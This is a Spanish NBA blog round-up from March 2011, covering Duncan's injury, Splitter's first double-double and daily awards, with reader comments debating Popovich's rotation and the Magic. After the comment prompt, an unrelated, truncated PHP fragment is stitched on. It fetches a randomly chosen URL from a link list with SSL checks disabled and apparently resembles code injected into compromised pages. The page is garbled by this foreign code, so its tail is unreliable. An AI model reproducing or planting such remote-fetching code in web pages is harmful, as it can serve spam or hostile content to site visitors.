La Crónica (21/03/2011)

22 de March de 2011 por TheDeerHunter

Lesión de Tim Duncan. Tras perderse su primer partido en siglos el otro día podían permitirse bromear acerca de su edad. Dos noches después a nadie se le ocurre hacer tal cosa. Duncan permanecerá indefinidamente fuera de servicio a causa de un fuerte esguince en el minuto 4 del partido contra Golden State. La lesión, efectivamente, no es de las más graves que podría acontecerle, pero el momento sí lo es y la edad y lo delicadas que son las articulaciones es lo que realmente genera la máxima de las preocupaciones. Bromas ninguna.

Ahora a los Spurs no les queda otra que esperar a que vuelva el “Gran Capitán” y mientras ir sacando sus compromisos adelante.

Dentro de lo malo de la situación es buena noticia que tuvieran a un tal Tiago Splitter en el fondo del banquillo. Tuvieron que tirar de él y el brasileño mostró el talento del que en Europa estábamos más que acostumbrados. Su primer gran partido en la NBA y victoria, eso sí, contra los Warriors (96-111).

El resto de la jornada fue aburrida a más no poder. Los Bulls celebraron la vuelta de Boozer clavándole 132 puntos a Sacramento. 8 hombres en dobles figuras incluido un partido inmaculado de Omer Asik con un 6 de 6 en tiros (92-132). Orlando ganó sin despeinarse a Cleveland (97-86) y los Celtics rascaron en la herida de los Knicks, eso sí, sin despejar ciertas dudas. Doc Rivers tuvo que decirles en descanso que eran un atajo de “Marías” para hacerles reaccionar. Lo hicieron (96-86).

Por último excelentes resultados para los que se aferan a la 8ª plaza de cada conferencia. Los Grizzlies vencieron brillantemente a Utah (85-103), de la mano de Zach Randolph y los Pacers hicieron lo propio frente a los Nets (102-98).

PREMIOS

MVP: Dwight Howard ha sido el mejor del día con muchísima diferencia. 28 puntos, 9 de 11 en tiros de campo, 18 rebotes, 4 asistencias, 4 robos y 4 tapones. Cierto es que lo consiguió ante, posiblemente, el peor juego interior de la liga.

Rookie: ¡Qué ganas teníamos de decir esto! Tiago Splitter fue el mejor rookie del día al conseguir su primer doble-doble en la NBA. En 27 minutos, se fue a los 10 puntos y 14 rebotes. Se enfrentó a un Ekpe Udoh que tampoco lo hizo mal: 15 puntos y 7 rebotes.

Sorpresa: Sundiata Gaines… ¿De qué nos suena este nombre? Posiblemente del canastón que se marcó el año pasado cuando jugaba con los Jazz para ganarle un partido a los Cavs de Lebron. Ahora anda en los Nets y ayer fue el mejor de su equipo con 18 puntos, 6 rebotes, 3 asistencias y 3 robos.

Decepción: Tras ser el mejor hombre en los últimos segundos de la victoria de los Raptors frente los Thunder,  ayer Leandro Barbosa nos dio la de arena. 2 de 11 en tiros de campo en 17 minutos.

Esfuerzo en vano: A pesar de los 25 puntos y 3 robos de Marcus Thorton, los Bulls pasaron por encima de los Kings en todos y cada uno de los cuartos.

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. inad23 dice:
    #1

    y los denver contra raptors? 😉

      Citar

  2. Denise dice:
    #2

    Tienen que lesionarse Duncan y Blair para que Popovich tenga que tirar obligatoriamente de Splitter.
    Algunas veces me pregunto la manera que tienen los coachs americanos de utilizar sus recursos.
    Los entrenadores europeos por regla general tendrán muchos defectos, pero, desde el minuto 1 en que comienza la pretemporada todos los jugadores son iguales, todos tienen sus oportunidades y juegan en cada momento los que se lo merecen. En la NBA prima otra serie de aspectos.
    Y ahora me saldreis que si Popovich tiene 4 anillos y bla bla, pero me resulta incomprensible que mantenga al dinosaurio de McDyess en la rotación antes que a Splitter

      Citar

  3. TheDeerHunter dice:
    #3

    @inad: ups!!! ;D

    @Denise: Por un lado no te puedes quejar del rendimiento de McDyess… pero coincido contigo en que no entiendo la infrautilización de Splitter.
    Por otro lado ¿este detalle invalida a Splitter como gran jugador como has apuntado tú en otros casos? Yo creo que no y ya sabes donde va a ir a parar Splitter en los momentos decisivos.

      Citar

  4. Viva_Dirk dice:
    #4

    No creo que se pueda cuestionar como gestiona Popovich sus plantillas, yo también esperaba que Splitter jugara mas, pero estan siendo el mejor equipo de la temporada con Splitter jugando 11 minutos y seguro que esta aprendiendo un montón de cosas que le serán muy utiles para cuando tenga que coger responsabilidades.

    Ginobili su primer año jugó 20 minutos, y creo que si Splitter no se hubiera lesionado a principio de temporada el plan habria sido parecido.

      Citar

  5. Sancho88 dice:
    #5

    Si Asik sigue trabajando así, veo a Chicago muy cerca de las finales de conferencia. Eran las dudas que generaban siempre, en su juego interior, y este año tienen dos cracks (Boozer-Noah) con dos suplentes de muchísimas garantías (Gibson-Asik). Les conviene mantenerse ahí, a la zaga, segunditos. Son muy superiores a New York (7º) y en semifinales les conviene mas Miami (3º) que Orlando (4º). Orlando-Boston puede ser muy peligroso, y creo que Boston quiere quedar segundo y por eso flojea tan seriamente en algunos partidos. Y es que todo se reduce a que no creo que nadie quiera cruzarse en el Este con Dwight Howard, para mí el mejor jugador de la temporada. Turkoglu tiene porte de lider. Ha renacido claramente en su ‘casa’ y vuelve a subir la bola, a sentirse seguro, a clavar sus triples. Brandon Bass es una auténtica bestia, con un juego de pies muy bueno. El problema que puede tener Orlando es si se lesiona uno de estos, porque se quedan sin recambios. Turkoglu puede jugar de 4, pero no es su sitio. Ahi puede jugar duro una o dos noches en playoffs. El resto se cargaría de faltas continuamente.

      Citar

  6. Denise dice:
    #6

    Está claro que Orlando sin Howard no es nada. No pasarían ni la primera ronda.
    A partir de ahí, aunque la temporada del turco no es mala si lo comparamos con lo que hizo en Toronto y Phoenix, creo que él y sobre todo Arenas deben de dar un paso adelante. Lo de Arenas es lamentable, da asco verlo arrastrandose por las pistas.
    La zona de los Magic con Howard, Bass y Anderson es la mejor ofensivamente del Este. Puntos no nos van a faltar de los hombres altos, el problema es la irregularidad de gente como Turkoglu, Redick y Arenas.
    En que éstos tres metan sus tiros exteriores y aporten minutos de calidad está la clave para que Orlando pueda ganar una ronda a Miami, Boston y Chicago. De los demás jugadores de la rotación no tengo dudas de que van a rendir bien en playoffs, por lo tanto, el rendimiento de estos tres es lo que marcará el futuro de Orlando, nunca sabes que puede pasar con este equipo, si lo mejor o lo peor.
    Otro problema es la rotación, años atrás teniamos 12 tios que podían jugar perfectamente media hora si hacía falta, pero gracias a los grandisimos fichajes de este verano (Duhon y Quentin) este año la rotación solo es de 8 jugadores y medio (contando como medio a Clark). Si a ello le umas, que Arenas está restando en vez de sumar, el resultado es una plantilla muy corta de efectivos.

      Citar

  7. Roberto dice:
    #7

    Es verdad que Poppovich tuvo que usar a Splitter por la lesión de Duncan y Blair pero las figuras de San Antonio fueron Ginóbili (28 puntos) y Parker (15 asistencias).

      Citar

  8. TheDeerHunter dice:
    #8

    Nadie ha dicho que la figura del partido fuera Splitter.
    No obstante, obviamente debe ser más noticioso su partido que el de Ginobili o Parker y por eso lo destacamos… pero ya que estamos para mí tiene tanto mérito o más el hacer lo que hizo Splitter en los 27 minutos que pudo disfrutar por primera vez en todo el curso que lo que hicieron Parker y Ginobili, sin quitarle ni una pizca de mérito a ninguno de los tres.

      Citar

  9. Sancho88 dice:
    #9

    La que está liando Rose en el United Center. Santo dios

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>